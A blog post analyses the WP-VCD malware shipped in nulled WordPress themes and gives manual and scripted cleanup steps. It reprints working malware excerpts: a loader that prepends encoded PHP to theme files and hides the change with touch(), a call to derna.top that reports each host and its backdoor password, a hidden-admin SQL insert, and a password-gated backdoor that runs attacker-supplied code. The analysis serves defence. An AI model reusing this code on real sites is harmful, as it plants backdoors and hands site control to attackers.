I discovered that some of the shared freemium (nulled) WordPress themes/plugins websites carry the WP-VCD malware's onclick ads, and I wanted to test by myself how to get rid of this malware because it is spreading now. I understand that some bloggers have no budget to buy paid themes on ThemeForest and other paid WordPress theme sites.

And now I'll share my knowledge of how to clean/avoid malware in the paid themes/plugins you download for free from the freemium (nulled) WordPress themes/plugins websites. I tried downloading this great WordPress theme from VestaTheme.com for testing only, and I'm using Sublime Text to search for the malware in this theme. Now let's look inside it.

 

    • Check the functions.php in the theme directory.
      If you find this kind of code:

      <?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

      remove that line and delete class.theme-modules.php, because that file contains the obfuscated (encoded) malware code.
      See the code here: class.theme-modules.php

       

    • Once you activate the theme without removing the malware, it infects your WordPress core files. First, it adds files to the wp-includes folder. The injected wp-includes/wp-vcd.php starts with a long base64-encoded string named $install_code; the backdoor password is the md5 of the site's hostname and its AUTH_SALT, and it replaces the {$PASSWORD} placeholder in the decoded code, so every infected site gets its own password:

      $install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[...]
      // per-site backdoor password: md5 of the hostname and the AUTH_SALT from wp-config.php
      $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
      // decode the payload and fill in the password placeholder
      $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

      This file then prepends the decoded code to each theme's functions.php (skipping files that already contain the WP_V_CD marker) and resets the file's modification date and time with touch() so the change does not stand out:

      // excerpt from a loop in wp-vcd.php: $themes is the themes directory, $_ the current theme
      // folder and $time the modification time it restores (the post says it resets the timestamp)
      if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
          if (strpos($content, 'WP_V_CD') === false) {
              $content = $install_code . $content;   // injected code goes in front of the original file
              @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
              touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
          } else {
              $ping = false;
          }
      }

      see the code here: wp-vcd.php

      Then it reports the infected host and its generated password to the attacker's server via code.php, so the operator keeps a list of hostnames and backdoor passwords, and writes whatever code.php returns into wp-includes/class.wp.php:

      // phone home with this host and its backdoor password
      $content = @file_get_contents('http://www.derna.top/code.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
      // drop the server's response into wp-includes as class.wp.php
      @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.top/code.php'));

      class.wp.php then tries to insert a hidden user (ID and login 100010010, e-mail te@ea.st, with a pre-computed phpass password hash) into the WordPress users table:

      $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', 'te@ea.st', '', '2011-06-07 00:00:00', '', '0', '100010010');");

      You should delete both wp-vcd.php and class.wp.php from wp-includes, and remove the callback include that was added as the first line of wp-includes/post.php:

      <?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>

      Also check the users table for the row with ID 100010010 inserted above and delete it if it is present. Then check your theme's functions.php, because the loader prepended the malware's code to it.

      See the code here: functions.php
      Remove the following block:

      <?php
      // Backdoor prepended by wp-vcd.php. The password below is the per-site md5 the loader
      // computed for this install (md5 of the hostname and AUTH_SALT).
      if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '17a6d0135359512f9fc543b4e9d97596')) {
          $div_code_name = "wp_vcd";
          switch ($_REQUEST['action']) {

              // rewrite the command-and-control domain stored in this very file
              // (PHP accepts a semicolon as well as a colon after case)
              case 'change_domain';
                  if (isset($_REQUEST['newdomain'])) {
                      if (!empty($_REQUEST['newdomain'])) {
                          if ($file = @file_get_contents(__FILE__)) {
                              if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                                  $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                                  @file_put_contents(__FILE__, $file);
                                  print "true";
                              }
                          }
                      }
                  }
                  break;

              // replace whatever sits between //$start_wp_theme_tmp and //$end_wp_theme_tmp
              // with attacker-supplied PHP: arbitrary code execution on the site
              case 'change_code';
                  if (isset($_REQUEST['newcode'])) {
                      if (!empty($_REQUEST['newcode'])) {
                          if ($file = @file_get_contents(__FILE__)) {
                              if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                                  $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                  @file_put_contents(__FILE__, $file);
                                  print "true";
                              }
                          }
                      }
                  }
                  break;
      [......]?>

      and everything that follows it up to the malware's closing ?> tag; the original theme code starts right after that tag, since the loader prepended its code in front of it.
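To turn the manual steps above into something repeatable, here is an added example (my own code, not code from the original post or from the theme) that walks a WordPress install, flags the indicators described above and removes the ones that can be removed safely. It assumes the dropped file names (wp-vcd.php, class.wp.php, class.theme-modules.php) and the include lines exactly as shown in this post; the idea that the injected code is a single <?php ... ?> block sitting in front of the original functions.php is an assumption drawn from the $install_code . $content line, so anything still carrying markers after cleaning is left for manual review rather than cut. Given the site's hostname and the AUTH_SALT from wp-config.php it also recomputes the per-site backdoor password (md5 of HTTP_HOST . AUTH_SALT) and reports which files contain it. The function names scan, clean, expected_password and build_fixture, the hostname example.com and the salt are mine, and the fixture tree build_fixture writes into a temporary directory is constructed for the demonstration.

```python
# WP-VCD indicator scan and cleanup for a WordPress tree (added example, not the post's code).
import hashlib
import os
import re
import tempfile

# Files the loader drops into wp-includes, plus the one shipped inside the nulled theme.
DROPPED_FILES = {"wp-vcd.php", "class.wp.php", "class.theme-modules.php"}
# The one-line include prepended to wp-includes/post.php and to the theme's functions.php.
INCLUDE_RE = re.compile(
    r"^<\?php\s*if\s*\(\s*file_exists\(\s*dirname\(__FILE__\)\s*\.\s*'/(wp-vcd|class\.theme-modules)\.php'\s*\)\s*\)\s*"
    r"include_once\(\s*dirname\(__FILE__\)\s*\.\s*'/\1\.php'\s*\)\s*;\s*\?>[ \t]*\r?\n?", re.M)
# Strings the injected functions.php code carries (WP_V_CD is what wp-vcd.php itself checks for).
MARKER_RE = re.compile(r'WP_V_CD|\$div_code_name\s*=\s*"wp_vcd"|\$(?:start|end)_wp_theme_tmp')
# Assumption: the injected code is one <?php ... ?> block placed in front of the original file.
PREPENDED_RE = re.compile(r"\A<\?php[\s\S]*?\?>[ \t]*\r?\n?")


def expected_password(host, auth_salt):
    """md5(HTTP_HOST . AUTH_SALT): the value wp-vcd.php substitutes for {$PASSWORD}."""
    return hashlib.md5((host + auth_salt).encode()).hexdigest()


def scan(root, host=None, auth_salt=None):
    """Sorted (kind, relative path) findings; with host and AUTH_SALT also flags this site's password."""
    want = expected_password(host, auth_salt) if host and auth_salt else None
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name in DROPPED_FILES:
                findings.append(("dropped_file", rel))
                continue
            if not name.endswith(".php"):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if INCLUDE_RE.search(text):
                findings.append(("include_line", rel))
            if MARKER_RE.search(text):
                findings.append(("injected_code", rel))
            if want and want in text:
                findings.append(("site_password", rel))
    return sorted(findings)


def clean(root):
    """Delete dropped files, strip include lines and the prepended block; files that
    still carry markers afterwards are listed under "review" for manual cleanup."""
    per_file = {}
    for kind, rel in scan(root):
        per_file.setdefault(rel, set()).add(kind)
    result = {"removed": [], "edited": [], "review": []}
    for rel, kinds in sorted(per_file.items()):
        path = os.path.join(root, rel)
        if "dropped_file" in kinds:
            os.remove(path)
            result["removed"].append(rel)
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        new = INCLUDE_RE.sub("", text)
        if "injected_code" in kinds:
            m = PREPENDED_RE.match(new)
            if m and MARKER_RE.search(m.group(0)):  # cut the leading block only if the markers sit inside it
                new = new[m.end():]
        if new != text:
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(new)
            result["edited"].append(rel)
        if MARKER_RE.search(new):
            result["review"].append(rel)
    return result


# Constructed fixture: a small infected tree modelled on the snippets in the post.
ORIGINAL_FUNCTIONS = "<?php\n// theme functions (constructed stand-in)\nfunction vesta_setup() {}\n"
ORIGINAL_POST = "<?php\n/**\n * Core Post API (constructed stand-in)\n */\n"
INCLUDE_LINE = "<?php if (file_exists(dirname(__FILE__) . '/%s')) include_once(dirname(__FILE__) . '/%s'); ?>\n"


def build_fixture(host="example.com", auth_salt="constructed-salt"):
    root = tempfile.mkdtemp(prefix="wpvcd-")
    injected = (  # trimmed copy of the backdoor shape shown in the post, carrying this site's password
        "<?php\nif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '"
        + expected_password(host, auth_salt) + "')) {$div_code_name=\"wp_vcd\"; switch ($_REQUEST['action']) "
        "{ case 'change_domain'; break; } }\n//$start_wp_theme_tmp\n//$end_wp_theme_tmp\n?>\n")
    files = {
        "wp-includes/post.php": INCLUDE_LINE % (("wp-vcd.php",) * 2) + ORIGINAL_POST,
        "wp-includes/wp-vcd.php": "<?php $install_code = '...'; // dropped loader\n",
        "wp-includes/class.wp.php": "<?php // dropped payload\n",
        "wp-content/themes/vesta/functions.php": injected + INCLUDE_LINE % (("class.theme-modules.php",) * 2) + ORIGINAL_FUNCTIONS,
        "wp-content/themes/vesta/class.theme-modules.php": "<?php // obfuscated loader\n",
        "wp-content/themes/clean/functions.php": ORIGINAL_FUNCTIONS,
    }
    for rel, content in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root
```

Against a real install you would call scan("/var/www/html", "your.host", AUTH_SALT_from_wp_config) first, read the findings, take a backup, and only then run clean on the same directory. Two things it deliberately does not do: it never touches the database, so the user row with ID 100010010 still has to be removed by hand, and when the prepended block does not end where the assumption says (the markers are still present after stripping) it leaves the file alone and names it under "review" instead of guessing.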

Conclusion

Although this malware is noticed mostly through its ads, the change_code action above lets the operator replace the injected PHP with arbitrary code, so extra care is needed to avoid becoming a victim of this kind of attack even on an up-to-date WordPress install: the core was never the weak point here, the nulled theme was.

Keep a firewall with core file change monitoring, and always update your themes.

You can use the WordPress security plugin from WordFence.

I've been using WordFence Premium Security for the last month and it was a great plugin to protect your website from malware, and you can get a premium license for only $99/year.
You can also try it for free with limited features, but it still protects you from intruders, malware and other threats; it can block the countries you choose and scan live to monitor your site.

You can signup here for Premium here : WordFence Premium or
You can download here for Free: WordFence Free

Update

I noticed that this malware is capable of propagating on shared hosting where multiple WordPress installations are present under the same root directory (cross-site contamination).
It has been reported that the infection sometimes comes from nulled WordPress themes & plugins.

 

List of freemium nulled theme and plugin sites; avoid downloading from them if you don't want to infect your blog with tons of malware.

  • GFXNulled.Net
  • VestaThemes.com
  • JojoThemes.com
  • WPLocker.com
  • NulledThemes.net
  • NulledForest.com
  • and much more.

 
